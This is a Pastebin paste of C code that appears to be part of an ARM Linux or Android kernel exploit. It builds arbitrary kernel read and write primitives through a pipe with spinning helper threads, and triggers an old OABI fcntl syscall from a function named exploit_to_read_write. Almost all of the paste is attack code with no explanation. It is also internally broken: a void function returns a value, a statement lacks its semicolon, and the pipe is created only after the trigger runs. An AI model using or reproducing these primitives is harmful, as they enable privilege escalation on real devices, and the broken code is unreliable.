Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- struct thread_arg
- {
- char * buf;
- size_t size;
- };
- int rw_pipe[2];
- struct thread_arg ta_read, ta_write;
- int read_asked = 0, read_done = 0, write_asked = 0, write_done = 0;
- void spin(int *lock)
- {
- while(!*lock)
- usleep(1000);
- }
- void *thread_read_pipe(void *arg)
- {
- struct thread_arg *a = (struct thread_arg*) arg;
- while(1)
- {
- spin(&read_asked);
- if(read(rw_pipe[0], a->buf, a->size) < a->size)
- syserror("read_rw\n");
- read_asked=0;
- read_done=1;
- }
- }
- void *thread_write_pipe(void *arg)
- {
- struct thread_arg *a = (struct thread_arg*) arg;
- while(1)
- {
- spin(&write_asked);
- if(write(rw_pipe[1], a->buf, a->size) < a->size)
- syserror("write_rw\n");
- write_asked=0;
- write_done=1;
- }
- }
- int kread(kaddr_t addr,void * buf, size_t size)
- {
- if(write(rw_pipe[1], addr, size)<size)
- syserror("write_rw\n");
- read_done = 0;
- ta_read.buf = buf;
- ta_read.size = size;
- read_asked=1;
- spin(&read_done);
- return size;
- }
- void kwrite(kaddr_t addr, void *buf, size_t size)
- {
- size_t ret;
- write_done = 0;
- ta_write.buf = buf;
- ta_write.size = size;
- write_asked = 1;
- spin(&write_done);
- if((ret = read(rw_pipe[0], addr, size))<size)
- syserror("read_rw\n");
- return ret;
- }
- void try_oabi(int dummy, unsigned long r1, char* aa)
- {
- __asm__ volatile("SVC #0x9000dd\n\t");
- }
- int exploit_to_read_write()
- {
- char buf[1000];
- pthread_t tid;
- pthread_create(&tid, NULL, thread_read_pipe,&ta_read);
- pthread_create(&tid, NULL, thread_write_pipe,&ta_write);
- log("calling oabi fcntl...")
- try_oabi(0,36, buf);
- success("Done!");
- if(pipe(rw_pipe) < 0)
- {
- syserror("pipe_rw");
- exit(1);
- }
- return 1;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
